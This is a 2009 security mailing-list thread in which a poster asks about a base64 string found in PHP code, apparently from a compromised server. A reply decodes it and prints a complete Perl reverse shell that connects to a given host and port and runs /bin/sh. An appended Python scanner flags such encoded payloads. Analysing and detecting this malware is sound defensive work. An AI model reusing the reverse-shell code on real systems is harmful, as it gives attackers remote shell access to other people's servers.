Technically it doesn't decrypt to anything, it decodes. :)

On Feb 10, 2009, at 1:44 PM, Razi Shaban wrote:

> On Tue, Feb 10, 2009 at 8:23 PM, sr. <static...@gmail.com> wrote:
>> can anyone tell me what encoding this is?
>>
>> $back_connect =
>> "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj
>> aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR
>> hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT
>> sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI
>> kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi
>> KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl
>> OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
>>
>> this has to do with old php 4.x.x version with magic quotes enabled.
>> i'm just trying to figure out what the connect back code does.
>>
>> any input is much appreciated.
>>
>> thx,
>>
>> sr.
>>
>
> Base64, the "==" at the end gives it away. It decrypts to:
>
> #!/usr/bin/perl
> use Socket;
> $cmd= "lynx";
> $system= 'echo "`uname -a`";echo "`id`";/bin/sh';
> $0=$cmd;
> $target=$ARGV[0];
> $port=$ARGV[1];
> $iaddr=inet_aton($target) || die("Error: $!\n");
> $paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");
> $proto=getprotobyname('tcp');
> socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
> connect(SOCKET, $paddr) || die("Error: $!\n");
> open(STDIN, ">&SOCKET");
> open(STDOUT, ">&SOCKET");
> open(STDERR, ">&SOCKET");
> system($system);
> close(STDIN);
> close(STDOUT);
> close(STDERR);
>
> --
>
> Regards,
> Razi Shaban
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

Simon Smith
si...@snosoft.com

--------------------------------------
Subscribe to our blog
http://snosoft.blogspot.com
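
Decoding a suspicious string literal, as done by hand in the thread above, can be automated when reviewing a web root. The following Python is an added example, not part of the thread: it finds base64 literals in source text, tolerates the whitespace and `>` quote markers that split the blob in this mail, and flags decoded text that looks like a script opening a socket or shell. The function names and the indicator list are assumptions, and the sample input is constructed and harmless.

```python
import base64
import binascii
import re

# A quoted literal made of base64 characters. Whitespace and '>' are allowed
# because mail wrapping and quoting split the blob in the thread above.
LITERAL = re.compile(r"""(["'])([A-Za-z0-9+/=\s>]{40,})\1""")

# Assumed indicator strings: decoded text that looks like a script opening a
# socket or spawning a shell deserves a closer look.
INDICATORS = ("#!/", "use Socket", "socket(", "connect(", "system(", "/bin/sh")


def decode_candidate(raw):
    """Return the decoded text, or None when raw is not base64-encoded text."""
    cleaned = re.sub(r"[\s>]", "", raw).rstrip("=")
    cleaned += "=" * (-len(cleaned) % 4)  # padding may be absent, so re-pad
    try:
        return base64.b64decode(cleaned, validate=True).decode("utf-8")
    except (binascii.Error, ValueError):  # UnicodeDecodeError is a ValueError
        return None


def scan(source):
    """List literals in source whose decoded form contains an indicator."""
    findings = []
    for match in LITERAL.finditer(source):
        text = decode_candidate(match.group(2))
        hits = [i for i in INDICATORS if text and i in text]
        if hits:
            findings.append({"offset": match.start(), "hits": hits,
                             "first_line": text.splitlines()[0]})
    return findings


def constructed_sample():
    """Constructed PHP line; the encoded script is a harmless stand-in."""
    script = '#!/usr/bin/perl\r\nuse Socket;\r\nprint "constructed sample";\r\n'
    blob = base64.b64encode(script.encode()).decode()
    wrapped = "\n>> ".join(blob[i:i + 30] for i in range(0, len(blob), 30))
    return '$back_connect = "%s";\n$title = "plain words, not a payload";' % wrapped


if __name__ == "__main__":
    for finding in scan(constructed_sample()):
        print(finding)
```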